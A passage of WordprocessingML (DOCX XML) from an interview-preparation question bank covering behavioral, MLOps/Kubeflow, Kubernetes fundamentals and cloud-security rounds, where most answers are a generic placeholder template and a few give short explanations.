      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q88. How do you handle pressure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Behavioral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handle pressure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q89. What is your biggest achievement?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Behavioral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your biggest achievement?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q90. What are your strengths?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Behavioral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your strengths?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q91. What are your weaknesses?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Behavioral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your weaknesses?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q92. Where do you see yourself in five years?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Behavioral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Where do you see yourself in five years?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q93. What is MLOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps / AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: MLOps, or Machine Learning Operations, is the practice of applying DevOps principles to the machine learning lifecycle. It helps automate and manage the end-to-end ML workflow, including data preparation, model training, deployment, monitoring, and retraining in production environments.</w:t>
        <w:br/>
        <w:t>The main goal of MLOps is to make ML models scalable, reliable, reproducible, and easy to maintain. It also improves collaboration between data scientists, ML engineers, and DevOps teams.</w:t>
        <w:br/>
        <w:t>In production, MLOps helps handle challenges like model versioning, CI/CD automation, infrastructure scaling, model drift detection, and continuous monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q94. Have you worked with MLflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps / AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps / AI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with MLflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q95. How would you deploy an ML model?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps / AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps / AI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deploy an ML model?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q96. How would you monitor ML models?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps / AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps / AI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monitor ML models?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q97. What is Kubeflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps / AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Kubeflow￼ is an open-source MLOps platform built on Kubernetes that is used to develop, orchestrate, deploy, and manage machine learning workflows in scalable production environments.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It provides a complete ecosystem for automating the ML lifecycle, including:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Data preprocessing</w:t>
        <w:br/>
        <w:t>* Model training</w:t>
        <w:br/>
        <w:t>* Hyperparameter tuning</w:t>
        <w:br/>
        <w:t>* Pipeline orchestration</w:t>
        <w:br/>
        <w:t>* Model serving</w:t>
        <w:br/>
        <w:t>* Monitoring</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubeflow helps data scientists and ML engineers run ML workloads efficiently on Kubernetes with portability and scalability.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key components of Kubeflow include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Kubeflow Pipelines → Workflow orchestration</w:t>
        <w:br/>
        <w:t>* Katib → Hyperparameter tuning</w:t>
        <w:br/>
        <w:t>* KServe → Model serving</w:t>
        <w:br/>
        <w:t>* Notebook servers → Interactive development</w:t>
        <w:br/>
        <w:t>* Training Operators → Distributed model training</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production MLOps systems, Kubeflow is commonly used for:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Automating ML pipelines</w:t>
        <w:br/>
        <w:t>* GPU/CPU resource management</w:t>
        <w:br/>
        <w:t>* Scalable distributed training</w:t>
        <w:br/>
        <w:t>* CI/CD integration for ML</w:t>
        <w:br/>
        <w:t>* Multi-user ML environments</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Since it is Kubernetes-native, Kubeflow integrates well with cloud platforms, containers, autoscaling, monitoring, and DevOps tooling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q98. How would you build an end-to-end MLOps pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps / AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps / AI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build an end-to-end MLOps pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 63 - Kubernetes Fundamentals Transcript Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How does Kubernetes FQDN resolve to an IP address? Explain service.namespace.svc.cluster.local and how DNS resolves the service name.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes DNS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes DNS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Kubernetes FQDN resolve to an IP address? Explain service.namespace.svc.cluster.local and how DNS resolves the service name.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What is the role of CoreDNS in Kubernetes? How does CoreDNS resolve service names, and does it communicate with the API server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CoreDNS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CoreDNS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role of CoreDNS in Kubernetes? How does CoreDNS resolve service names, and does it communicate with the API server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Is CoreDNS a bridge between etcd and the Kubernetes API server? If not, what is its actual role?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CoreDNS/API Server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CoreDNS/API Server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Is CoreDNS a bridge between etcd and the Kubernetes API server? If not, what is its actual role?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What is RBAC in Kubernetes? Why do we use RBAC? Explain Role, ClusterRole, RoleBinding, and ClusterRoleBinding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes RBAC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes RBAC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RBAC in Kubernetes? Why do we use RBAC? Explain Role, ClusterRole, RoleBinding, and ClusterRoleBinding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Suppose an application goes down in a Kubernetes cluster. How does the master or control plane know that the application is down? How does the signal reach the control plane?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Health</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Health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Suppose an application goes down in a Kubernetes cluster. How does the master or control plane know that the application is down? How does the signal reach the control plane?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Which component detects that a pod or application has become unhealthy, and what is the role of kubelet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubelet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubelet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component detects that a pod or application has become unhealthy, and what is the role of kubelet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Is kubelet a worker node component or a master/control plane component?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubelet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubelet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Is kubelet a worker node component or a master/control plane component?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How does kubelet communicate with the control plane, and what is the role of the API server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubelet/API Server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubelet/API Server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kubelet communicate with the control plane, and what is the role of the API server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Explain the Liveness Probe. When is it used, and what happens if it fails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Liveness Probe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Liveness Probe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the Liveness Probe. When is it used, and what happens if it fails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Explain the Readiness Probe. How is it different from the Liveness Probe?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Readiness Probe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Readiness Probe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the Readiness Probe. How is it different from the Liveness Probe?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. If an application gets stuck or becomes unhealthy, does Kubernetes execute a kubectl command to restart it? If not, how is the restart triggered?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Container Restart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Container Restart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an application gets stuck or becomes unhealthy, does Kubernetes execute a kubectl command to restart it? If not, how is the restart triggered?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How does kubelet restart a failed container? Does kubelet communicate directly with the container runtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Container Runtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Container Runtime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kubelet restart a failed container? Does kubelet communicate directly with the container runtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. What is the complete flow when an application crashes: Application to Kubelet to API Server to etcd to Controller Manager to new Pod or restart?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Failure Flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Failure Flow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complete flow when an application crashes: Application to Kubelet to API Server to etcd to Controller Manager to new Pod or restart?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. What do you mean by content correlation in the context of Kubernetes or observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Content Correlation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Content Correlation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do you mean by content correlation in the context of Kubernetes or observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 64 - Security Database Ansible CI/CD Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Your application is written in which language? Is it Java, Python, Node.js, or a mix of technologies?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Application Stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Application Stack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Your application is written in which language? Is it Java, Python, Node.js, or a mix of technologies?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Have you deployed Sentinel antivirus? Is it scanning the Kubernetes cluster, worker nodes, or container applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Sentinel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Sentinel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deployed Sentinel antivirus? Is it scanning the Kubernetes cluster, worker nodes, or container applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you integrate Sentinel with your applications? How does it work with GKE/Kubernetes, and when is the image scanned?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Sentinel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Sentinel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integrate Sentinel with your applications? How does it work with GKE/Kubernetes, and when is the image scanned?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. After deployment, how do you monitor the infrastructure? How is Prisma or Cloud Security used, and what kind of misconfigurations does it detect, such as excessive IAM permissions like Owner role?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud 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After deployment, how do you monitor the infrastructure? How is Prisma or Cloud Security used, and what kind of misconfigurations does it detect, such as excessive IAM permissions like Owner role?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. You mentioned PostgreSQL, MySQL, and MongoDB. Are you working as a DBA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
